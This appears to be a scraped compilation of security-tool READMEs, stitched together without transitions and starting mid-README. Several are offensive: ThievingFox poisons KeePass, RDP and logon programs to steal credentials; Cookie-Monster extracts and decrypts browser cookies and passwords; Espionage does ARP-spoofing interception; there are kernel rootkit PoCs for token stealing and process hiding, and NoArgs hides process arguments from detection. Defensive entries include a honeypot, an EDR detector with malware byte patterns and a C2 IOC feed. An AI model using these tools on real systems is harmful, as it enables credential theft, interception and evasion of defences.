hive, meaning all users will be impacted. By default, only all currently logged in users are impacted (all users that have a HKCU
hive).
--keepass
and --keepassxc
have specific options, --keepass-path
, --keepass-share
, and --keepassxc-path
, --keepassxc-share
, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.
The KeePass modules requires the Visual C++ Redistributable
to be installed on the target.
Multiple applications can be specified at once, or, the --all
flag can be used to target all applications.
[!IMPORTANT] Remember to clean the cache if you ever change the
--tempdir
parameter, since the directory name is embedded inside native DLLs.
$ python3 client/ThievingFox.py poison -h
usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
[--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
[--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to poison KeePass.exe
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepassxc Try to poison KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--ke epassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to poison mstsc.exe
--mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
logged in (Default: False)
--consent Try to poison Consent.exe
--logonui Try to poison LogonUI.exe
--rdcman Try to poison RDCMan.exe
--rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
logged in (Default: False)
--mobaxterm Try to poison MobaXTerm.exe
--mobaxterm-poison-hkcr
Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
logged in (Default: False)
--all Try to poison all applications
For each application specified in the command line parameters, the cleanup
first removes poisonning artifacts that force the target application to load the hooking library. Then, it tries to delete the library that were uploaded to the remote host.
For applications that support poisonning of both HKCU
and HKCR
hives, both are cleaned up regardless.
Multiple applications can be specified at once, or, the --all
flag can be used to cleanup all applications.
It does not clean extracted credentials on the remote host.
[!IMPORTANT] If the targeted application is in use while the
cleanup
module is ran, the DLL that are dropped on the target cannot be deleted. Nonetheless, thecleanup
module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted byThievingFox
are logged.
$ python3 client/ThievingFox.py cleanup -h
usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
[--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
[--rdcman] [--mobaxterm] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and cons ent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to cleanup all poisonning artifacts related to KeePass.exe
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to cleanup all poisonning artifacts related to mstsc.exe
--consent Try to cleanup all poisonning artifacts related to Consent.exe
--logonui Try to cleanup all poisonning artifacts related to LogonUI.exe
--rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe
--mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe
--all Try to cleanup all poisonning artifacts related to all applications
For each application specified on the command line parameters, the collect
module retrieves output files on the remote host stored inside C:\Windows\Temp\<tempdir>
corresponding to the application, and decrypts them. The files are deleted from the remote host, and retrieved data is stored in client/ouput/
.
Multiple applications can be specified at once, or, the --all
flag can be used to collect logs from all applications.
$ python3 client/ThievingFox.py collect -h
usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
[--logonui] [--rdcman] [--mobaxterm] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of th e domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Collect KeePass.exe logs
--keepassxc Collect KeePassXC.exe logs
--mstsc Collect mstsc.exe logs
--consent Collect Consent.exe logs
--logonui Collect LogonUI.exe logs
--rdcman Collect RDCMan.exe logs
--mobaxterm Collect MobaXTerm.exe logs
--all Collect logs from all applications
TL;DR: Galah (/ษกษหlษห/ - pronounced 'guh-laa') is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.
Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!
I've deployed a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce the cost of the OpenAI API. The cache stores responses per port, meaning if you probe a specific port of the honeypot, the generated response won't be returned for the same request on a different port.
The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.
Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard, or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.
Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.
Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.
Support for Other LLMs.
config.yaml
file.% git clone git@github.com:0x4D31/galah.git
% cd galah
% go mod download
% go build
% ./galah -i en0 -v
โโโโโโ โโโโโ โโ โโโโโ โโ โโ
โโ โโ โโ โโ โโ โโ โโ โโ
โโ โโโ โโโโโโโ โโ โโโโโโโ โโโโโโโ
โโ โโ โโ โโ โโ โโ โโ โโ โโ
โโโโโโ โโ โโ โโโโโโโ โโ โโ โโ โโ
llm-based web honeypot // version 1.0
author: Adel "0x4D31" Karimi
2024/01/01 04:29:10 Starting HTTP server on port 8080
2024/01/01 04:29:10 Starting HTTP server on port 8888
2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned
2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
2024/01/01 04:35:59 Sending the crafted response to [::1]:65434
^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
2024/01/01 04:39:27 All servers shut down gracefully.
Here are some example responses:
% curl http://localhost:8080/login.php
<!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>
JSON log record:
{"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}
% curl http://localhost:8080/.aws/credentials
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
region = us-west-2
JSON log record:
{"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}
Okay, that was impressive!
Now, let's do some sort of adversarial testing!
% curl http://localhost:8888/are-you-a-honeypot
No, I am a server.`
JSON log record:
{"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}
๐
% curl http://localhost:8888/i-mean-are-you-a-fake-server`
No, I am not a fake server.
JSON log record:
{"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}
You're a galah, mate!
CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.
Detection | Description |
---|---|
Direct Syscall | Detects the usage of direct system calls, often employed by malware to bypass traditional API hooks. |
NTDLL Unhooking | Identifies attempts to unhook functions within the NTDLL library, a common evasion technique. |
AMSI Patch | Detects modifications to the Anti-Malware Scan Interface (AMSI) through byte-level analysis. |
ETW Patch | Detects byte-level alterations to Event Tracing for Windows (ETW), commonly manipulated by malware to evade detection. |
PE Stomping | Identifies instances of PE (Portable Executable) stomping. |
Reflective PE Loading | Detects the reflective loading of PE files, a technique employed by malware to avoid static analysis. |
Unbacked Thread Origin | Identifies threads originating from unbacked memory regions, often indicative of malicious activity. |
Unbacked Thread Start Address | Detects threads with start addresses pointing to unbacked memory, a potential sign of code injection. |
API hooking | Places a hook on the NtWriteVirtualMemory function to monitor memory modifications. |
Custom Pattern Search | Allows users to search for specific patterns provided in a JSON file, facilitating the identification of known malware signatures. |
To get started with CrimsonEDR, follow these steps:
bash sudo apt-get install gcc-mingw-w64-x86-64
bash git clone https://github.com/Helixo32/CrimsonEDR
bash cd CrimsonEDR; chmod +x compile.sh; ./compile.sh
Windows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.
To use CrimsonEDR, follow these steps:
ioc.json
file is placed in the current directory from which the executable being monitored is launched. For example, if you launch your executable to monitor from C:\Users\admin\
, the DLL will look for ioc.json
in C:\Users\admin\ioc.json
. Currently, ioc.json
contains patterns related to msfvenom
. You can easily add your own in the following format:{
"IOC": [
["0x03", "0x4c", "0x24", "0x08", "0x45", "0x39", "0xd1", "0x75"],
["0xf1", "0x4c", "0x03", "0x4c", "0x24", "0x08", "0x45", "0x39"],
["0x58", "0x44", "0x8b", "0x40", "0x24", "0x49", "0x01", "0xd0"],
["0x66", "0x41", "0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40"],
["0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40", "0x1c", "0x49"],
["0x01", "0xc1", "0x38", "0xe0", "0x75", "0xf1", "0x4c", "0x03"],
["0x24", "0x49", "0x01", "0xd0", "0x66", "0x41", "0x8b", "0x0c"],
["0xe8", "0xcc", "0x00", "0x00", "0x00", "0x41", "0x51", "0x41"]
]
}
Execute CrimsonEDRPanel.exe
with the following arguments:
-d <path_to_dll>
: Specifies the path to the CrimsonEDR.dll
file.
-p <process_id>
: Specifies the Process ID (PID) of the target process where you want to inject the DLL.
For example:
.\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234
Here are some useful resources that helped in the development of this project:
For questions, feedback, or support, please reach out to me via:
bash git clone https://github.com/your_username/status-checker.git cd status-checker
bash pip install -r requirements.txt
python status_checker.py [-h] [-d DOMAIN] [-l LIST] [-o OUTPUT] [-v] [-update]
-d
, --domain
: Single domain/URL to check.-l
, --list
: File containing a list of domains/URLs to check.-o
, --output
: File to save the output.-v
, --version
: Display version information.-update
: Update the tool.Example:
python status_checker.py -l urls.txt -o results.txt
This project is licensed under the MIT License - see the LICENSE file for details.
The Cyber Security Awareness Framework (CSAF) is a structured approach aimed at enhancing Cybersecurity" title="Cybersecurity">cybersecurity awareness and understanding among individuals, organizations, and communities. It provides guidance for the development of effective Cybersecurity" title="Cybersecurity">cybersecurity awareness programs, covering key areas such as assessing awareness needs, creating educational m aterials, conducting training and simulations, implementing communication campaigns, and measuring awareness levels. By adopting this framework, organizations can foster a robust security culture, enhance their ability to detect and respond to cyber threats, and mitigate the risks associated with attacks and security breaches.
Clone the repository
git clone https://github.com/csalab-id/csaf.git
Navigate to the project directory
cd csaf
Pull the Docker images
docker-compose --profile=all pull
Generate wazuh ssl certificate
docker-compose -f generate-indexer-certs.yml run --rm generator
For security reason you should set env like this first
export ATTACK_PASS=ChangeMePlease
export DEFENSE_PASS=ChangeMePlease
export MONITOR_PASS=ChangeMePlease
export SPLUNK_PASS=ChangeMePlease
export GOPHISH_PASS=ChangeMePlease
export MAIL_PASS=ChangeMePlease
export PURPLEOPS_PASS=ChangeMePlease
Start all the containers
docker-compose --profile=all up -d
You can run specific profiles for running specific labs with the following profiles - all - attackdefenselab - phisinglab - breachlab - soclab
For example
docker-compose --profile=attackdefenselab up -d
An exposed port can be accessed using a proxy socks5 client, SSH client, or HTTP client. Choose one for the best experience.
This Docker Compose application is released under the MIT License. See the LICENSE file for details.
Espionage is a network packet sniffer that intercepts large amounts of data being passed through an interface. The tool allows users to to run normal and verbose traffic analysis that shows a live feed of traffic, revealing packet direction, protocols, flags, etc. Espionage can also spoof ARP so, all data sent by the target gets redirected through the attacker (MiTM). Espionage supports IPv4, TCP/UDP, ICMP, and HTTP. Espionag e was written in Python 3.8 but it also supports version 3.6. This is the first version of the tool so please contact the developer if you want to help contribute and add more to Espionage. Note: This is not a Scapy wrapper, scapylib only assists with HTTP requests and ARP.
1: git clone https://www.github.com/josh0xA/Espionage.git
2: cd Espionage
3: sudo python3 -m pip install -r requirments.txt
4: sudo python3 espionage.py --help
sudo python3 espionage.py --normal --iface wlan0 -f capture_output.pcap
wlan0
with whatever your network interface is.sudo python3 espionage.py --verbose --iface wlan0 -f capture_output.pcap
sudo python3 espionage.py --normal --iface wlan0
sudo python3 espionage.py --verbose --httpraw --iface wlan0
sudo python3 espionage.py --target <target-ip-address> --iface wlan0
sudo python3 espionage.py --iface wlan0 --onlyhttp
sudo python3 espionage.py --iface wlan0 --onlyhttpsecure
sudo python3 espionage.py --iface wlan0 --urlonly
usage: espionage.py [-h] [--version] [-n] [-v] [-url] [-o] [-ohs] [-hr] [-f FILENAME] -i IFACE
[-t TARGET]
optional arguments:
-h, --help show this help message and exit
--version returns the packet sniffers version.
-n, --normal executes a cleaner interception, less sophisticated.
-v, --verbose (recommended) executes a more in-depth packet interception/sniff.
-url, --urlonly only sniffs visited urls using http/https.
-o, --onlyhttp sniffs only tcp/http data, returns urls visited.
-ohs, --onlyhttpsecure
sniffs only https data, (port 443).
-hr, --httpraw displays raw packet data (byte order) recieved or sent on port 80.
(Recommended) arguments for data output (.pcap):
-f FILENAME, --filename FILENAME
name of file to store the output (make extension '.pcap').
(Required) arguments required for execution:
-i IFACE, --iface IFACE
specify network interface (ie. wlan0, eth0, wlan1, etc.)
(ARP Spoofing) required arguments in-order to use the ARP Spoofing utility:
-t TARGET, --target TARGET
A simple medium writeup can be found here:
Click Here For The Official Medium Article
The developer of this program, Josh Schiavone, written the following code for educational and ethical purposes only. The data sniffed/intercepted is not to be used for malicous intent. Josh Schiavone is not responsible or liable for misuse of this penetration testing tool. May God bless you all.
MIT License
Copyright (c) 2024 Josh Schiavone
Infromations Web Application Security
sudo apt install python3 python3-pip
pip3 install termcolor
pip3 install google
pip3 install optioncomplete
pip3 install bs4
pip3 install prettytable
git clone https://github.com/Matrix07ksa/HackerInfo/
cd HackerInfo
chmod +x HackerInfo
./HackerInfo -h
python3 HackerInfo.py -d www.facebook.com -f pdf
[+] <-- Running Domain_filter_File ....-->
[+] <-- Searching [www.facebook.com] Files [pdf] ....-->
https://www.facebook.com/gms_hub/share/dcvsda_wf.pdf
https://www.facebook.com/gms_hub/share/facebook_groups_for_pages.pdf
https://www.facebook.com/gms_hub/share/videorequirementschart.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_hi_in.pdf
https://www.facebook.com/gms_hub/share/bidding-strategy_decision-tree_en_us.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_es_la.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ar.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ur_pk.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_cs_cz.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_it_it.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pl_pl.pdf
h ttps://www.facebook.com/gms_hub/share/fundraise-on-facebook_nl.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pt_br.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_id_id.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_fr_fr.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_tr_tr.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_hi_in.pdf
https://www.facebook.com/rsrc.php/yA/r/AVye1Rrg376.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_ur_pk.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_nl_nl.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_de_de.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_de_de.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_cs_cz.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_sk_sk.pdf
https://www.facebook.com/gms _hub/share/creative-best-practices_japanese_jp.pdf
#####################[Finshid]########################
sudo python setup.py install
pip3 install hackinfo
Free to use IOC feed for various tools/malware. It started out for just C2 tools but has morphed into tracking infostealers and botnets as well. It uses shodan.io/">Shodan searches to collect the IPs. The most recent collection is always stored in data
; the IPs are broken down by tool and there is an all.txt
.
The feed should update daily. Actively working on making the backend more reliable
Many of the Shodan queries have been sourced from other CTI researchers:
Huge shoutout to them!
Thanks to BertJanCyber for creating the KQL query for ingesting this feed
And finally, thanks to Y_nexro for creating C2Live in order to visualize the data
If you want to host a private version, put your Shodan API key in an environment variable called SHODAN_API_KEY
echo SHODAN_API_KEY=API_KEY >> ~/.bashrc
bash
python3 -m pip install -r requirements.txt
python3 tracker.py
I encourage opening an issue/PR if you know of any additional Shodan searches for identifying adversary infrastructure. I will not set any hard guidelines around what can be submitted, just know, fidelity is paramount (high true/false positive ratio is the focus).
PoCs for Kernelmode rootkit techniques research or education. Currently focusing on Windows OS. All modules support 64bit OS only.
NOTE
Some modules use
ExAllocatePool2
API to allocate kernel pool memory.ExAllocatePool2
API is not supported in OSes older than Windows 10 Version 2004. If you want to test the modules in old OSes, replaceExAllocatePool2
API withExAllocatePoolWithTag
API.
ย
All modules are tested in Windows 11 x64. To test drivers, following options can be used for the testing machine:
debugging-in-windbg--cdb--or-ntsd">Setting Up Kernel-Mode Debugging
Each options require to disable secure boot.
Detailed information is given in README.md in each project's directories. All modules are tested in Windows 11.
Module Name | Description |
---|---|
BlockImageLoad | PoCs to block driver loading with Load Image Notify Callback method. |
BlockNewProc | PoCs to block new process with Process Notify Callback method. |
CreateToken | PoCs to get full privileged SYSTEM token with ZwCreateToken() API. |
DropProcAccess | PoCs to drop process handle access with Object Notify Callback. |
GetFullPrivs | PoCs to get full privileges with DKOM method. |
GetProcHandle | PoCs to get full access process handle from kernelmode. |
InjectLibrary | PoCs to perform DLL injection with Kernel APC Injection method. |
ModHide | PoCs to hide loaded kernel drivers with DKOM method. |
ProcHide | PoCs to hide process with DKOM method. |
ProcProtect | PoCs to manipulate Protected Process. |
QueryModule | PoCs to perform retrieving kernel driver loaded address information. |
StealToken | PoCs to perform token stealing from kernelmode. |
More PoCs especially about following things will be added later:
Pavel Yosifovich, Windows Kernel Programming, 2nd Edition (Independently published, 2023)
Reversing-<a href=" https:="" title="Obfuscation">Obfuscation/dp/1502489309">Bruce Dang, Alexandre Gazet, Elias Bachaalany, and Sรฉbastien Josse, Practical Reverse Engineering: x86, x64, ARM, Windows Kernel, Reversing Tools, and Obfuscation (Wiley Publishing, 2014)
Evasion-Corners/dp/144962636X">Bill Blunden, The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System, 2nd Edition (Jones & Bartlett Learning, 2012)
Steal browser cookies for edge, chrome and firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s) and then filelessly download the target. Once the Cookies/Login Data file(s) are downloaded, the python decryption script can help extract those secrets! Firefox module will parse the profiles.ini and locate where the logins.json and key4.db files are located and download them. A seperate github repo is referenced for offline decryption.
Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>]
cookie-monster Example:
cookie-monster --chrome
cookie-monster --edge
cookie-moster --firefox
cookie-monster --chromeCookiePID 1337
cookie-monster --chromeLoginDataPID 1337
cookie-monster --edgeCookiePID 4444
cookie-monster --edgeLoginDataPID 4444
cookie-monster Options:
--chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--firefox, looks for profiles.ini and locates the key4.db and logins.json file
--chromeCookiePID, if chrome PI D is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
--edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
Cookie Monster Example:
cookie-monster.exe --all
Cookie Monster Options:
-h, --help Show this help message and exit
--all Run chrome, edge, and firefox methods
--edge Extract edge keys and download Cookies/Login Data file to PWD
--chrome Extract chrome keys and download Cookies/Login Data file to PWD
--firefox Locate firefox key and Cookies, does not make a copy of either file
Install requirements
pip3 install -r requirements.txt
Base64 encode the webkit masterkey
python3 base64-encode.py "\xec\xfc...."
Decrypt Chrome/Edge Cookies File
python .\decrypt.py "XHh..." --cookies ChromeCookie.db
Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22
Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22
Decrypt Chome/Edge Passwords File
python .\decrypt.py "XHh..." --passwords ChromePasswords.db
Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty
Decrypt Firefox Cookies and Stored Credentials:
https://github.com/lclevy/firepwd
Ensure Mingw-w64 and make is installed on the linux prior to compiling.
make
to compile exe on windows
gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32
This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Fileless download: https://github.com/fortra/nanodump
Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI
NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.
The tool primarily operates by intercepting process creation calls made by the Windows API function CreateProcessW
. When a process is initiated, this function is responsible for spawning the new process, along with any specified command-line arguments. The tool intervenes in this process creation flow, ensuring that the arguments are either hidden or manipulated before the new process is launched.
Hooking into CreateProcessW
is achieved through Detours, a popular library for intercepting and redirecting Win32 API functions. Detours allows for the redirection of function calls to custom implementations while preserving the original functionality. By hooking into CreateProcessW
, the tool is able to intercept the process creation requests and execute its custom logic before allowing the process to be spawned.
The Process Environment Block (PEB) is a data structure utilized by Windows to store information about a process's environment and execution state. The tool leverages the PEB to manipulate the command-line arguments of the newly created processes. By modifying the command-line information stored within the PEB, the tool can alter or conceal the arguments passed to the process.
Process Hacker View:
Process Monitor View:
Injection into Command Prompt (cmd): The tool injects its code into the Command Prompt process, embedding it as Position Independent Code (PIC). This enables seamless integration into cmd's memory space, ensuring covert operation without reliance on specific memory addresses. (Only for The Obfuscated Executable in the releases page)
